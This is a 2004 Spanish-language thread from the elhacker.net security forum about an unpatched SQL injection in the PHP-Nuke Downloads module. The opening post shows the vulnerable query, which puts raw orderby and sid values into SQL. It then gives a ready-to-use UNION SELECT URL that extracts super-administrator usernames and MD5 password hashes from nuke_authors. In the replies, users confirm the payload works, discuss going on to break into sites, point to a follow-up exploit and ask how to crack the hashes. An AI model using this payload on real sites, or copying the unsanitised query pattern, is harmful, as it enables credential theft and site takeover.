elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
07 Octubre 2008, 08:30  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: sirdarckcat, berz3k)
| | |-+  Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)  (Leído 1499 veces)
el-brujo
Adm
*****
Desconectado Desconectado

Mensajes: 14.025


La libertad no se suplica, se conquista


Ver Perfil WWW
Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)
« en: 08 Mayo 2004, 04:45 »

Por DarkBicho

Esta falla se encuentra en la variable orderby en las siguientes lineas de codigo en el index.php de donwload en la linea 901

Código:
$result=$db->sql_query("
SELECT lid, url, title, description, date, hits, downloadratingsummary, totalvotes,
totalcomments, filesize, version, homepage
FROM ".$prefix."_downloads_downloads
WHERE sid=$sid
order by $orderby
limit $min,$perpage
");

Mediante el siguiente querry se hace la peticion para obtener los md5

Código:
localhost/nuke72/modules.php?name=Downloads
&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**
/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/
**/LIMIT/**/1/*

Hasta ahora no se ha sacado parche.

http://www.net-security.org/vuln.php?id=3434

Fuente:
http://www.darkbicho.tk/
« Última modificación: 08 Mayo 2004, 06:12 por el-brujo » En línea

Give peace a chance
Crack_X
Anti-War
Colaborador

Desconectado Desconectado

Mensajes: 2.324


Peace & Love


Ver Perfil WWW
Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)
« Respuesta #1 en: 08 Mayo 2004, 11:12 »

En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
Mr_x

Desconectado Desconectado

Mensajes: 2



Ver Perfil
Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)
« Respuesta #2 en: 08 Mayo 2004, 14:38 »

como de sencripto los md5 o Clave Hash
En línea
Crack_X
Anti-War
Colaborador

Desconectado Desconectado

Mensajes: 2.324


Peace & Love


Ver Perfil WWW
Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)
« Respuesta #3 en: 08 Mayo 2004, 23:58 »

En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
oRTNZ

Desconectado Desconectado

Mensajes: 814


no no soy malo... soy vicioso :p


Ver Perfil
Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)
« Respuesta #4 en: 11 Mayo 2004, 07:54 »

ya lo probe devuelve infaltablemente el hash ....
ahora sigue le segundo paso, aunque es mas complicado que el primer paso haber si logro penetrar a los php nuevamente  :P
En línea

(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
Ambolius

Desconectado Desconectado

Mensajes: 1.346


/España/Guadalajara


Ver Perfil
Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)
« Respuesta #5 en: 11 Mayo 2004, 10:23 »

Para este segundo paso como dices tenermos el explot hecho por blade pegado en este mismo subforo...
En línea

Un informático a otro:
- ¿Cuantos eran los Dálmatas?
- 101.
- Por el culo te la hinco.
Rentero
Colaborador

Desconectado Desconectado

Mensajes: 1.152


La paciencia es la madre de la ciencia.


Ver Perfil
Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)
« Respuesta #6 en: 12 Mayo 2004, 01:40 »

En línea

Firmado.
oRTNZ

Desconectado Desconectado

Mensajes: 814


no no soy malo... soy vicioso :p


Ver Perfil
Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)
« Respuesta #7 en: 12 Mayo 2004, 04:06 »

gracias Ambolius, lo tengo bien recordado  :P
En línea

(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
Nuker

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)
« Respuesta #8 en: 10 Junio 2004, 16:16 »

eso solo sirve desde linux cierto?
En línea
aNexos
Registered Linux User: 354086

Desconectado Desconectado

Mensajes: 4.457


¿Quieres saber?, toma tiempo para aprender.


Ver Perfil WWW
Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)
« Respuesta #9 en: 10 Junio 2004, 16:40 »

supongo que con "desde" te refieres a que tu estas en una maquina con s.o. Linux.

Pues no, no solo sirve desde Linux, de hecho el S.O. que manejes no tiene que ver con eso. eso es cosa del portal.
En línea



Páginas: [1] Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC
Free counter and web stats